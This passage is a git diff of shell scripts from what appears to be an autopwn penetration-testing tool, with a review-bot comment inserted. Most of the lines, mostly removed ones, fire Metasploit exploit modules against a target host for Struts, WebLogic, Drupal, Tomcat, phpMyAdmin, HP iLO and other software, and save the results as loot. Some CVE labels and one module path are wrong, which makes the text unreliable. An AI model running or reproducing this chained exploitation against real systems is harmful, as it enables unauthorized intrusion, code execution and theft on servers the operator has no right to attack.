$LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-php_cgi_arg_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use 
multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-phpmyadmin_3522_backdoor.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-joomla_comfields_sqli_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.txt 2> /dev/null - rm -f 
$LOOT_DIR/output/msf-$TARGET-port80-wordpress_content_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_content_type_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" - echo -e 
"${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_rest_xstream.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_code_exec_showcase.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw > 
$LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-tomcat_jsp_upload_bypass.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-struts2_namespace_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-cisco_directory_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET" - echo -e 
"${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-drupal_drupalgeddon2.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-weblogic_deserialize.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "80"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw > 
$LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-oscommerce_installer_unauth_code_exec.raw 2> /dev/null + PORT="80" + SSL="false" + source modes/web_autopwn.sh fi fi \ No newline at end of file diff --git a/modes/normal_webporthttps.sh b/modes/normal_webporthttps.sh index e6666ef8..577e8b05 100644 --- a/modes/normal_webporthttps.sh +++ b/modes/normal_webporthttps.sh 
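Review bot: The new `source modes/web_autopwn.sh` is a relative path that only resolves if the unchecked `cd $INSTALL_DIR` two lines above succeeded; if it did not, `source` fails with an error and, unless the script runs under `set -e`, the block continues as though the web exploits had run and nothing is written to the loot directory. Using `source "$INSTALL_DIR/modes/web_autopwn.sh"` removes the dependency on the working directory. `PORT` and `SSL` are assigned as plain globals, so any later code in the same process that reads those names will see `80` and `false`; a short comment such as `# inputs consumed by modes/web_autopwn.sh` above the two assignments would make that contract explicit. The file also ends without a trailing newline after the final `fi`, and the outer `if` this hunk closes begins before it.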
@@ -107,164 +107,8 @@ if [ "$MODE" = "web" ]; then fi cd $INSTALL_DIR if [ "$METASPLOIT_EXPLOIT" == "1" ]; then - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port443-http_put.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-http_put.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-webdav_website_content.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x 
"use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-iis_webdav_scstoragepathfromurl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-tomcat_utf8_traversal.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.txt 
2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-apache_optionsbleed.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-hp_ilo_create_admin_account.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ELASTICSEARCH DYNAMIC SCRIPT JAVA INJECTION EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/elasticsearch/script_mvel_rce; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-script_mvel_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-script_mvel_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-script_mvel_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-script_mvel_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - 
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupageddon.raw 2> /dev/null - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING GLASSFISH ADMIN TRAVERSAL EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use scanner/http/glassfish_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-glassfish_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-glassfish_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-glassfish_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-glassfish_traversal.raw 2> /dev/null - - - - - - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.txt 2> /dev/null - rm -f 
$LOOT_DIR/output/msf-$TARGET-port443-ms15_034_http_sys_memory_dump.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port80-badblue_passthru.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-php_cgi_arg_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST 
"$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/htp/phpmyadmin_preg_replace; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw > $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw > 
$LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - 
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw 
- sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw 2> /dev/null - echo -e "${OKGREEN}====================================================================================${RESET}" - echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET" - echo -e "${OKGREEN}====================================================================================${RESET}" - msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw - sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.txt 2> /dev/null - rm -f $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw 2> /dev/null - echo -e 
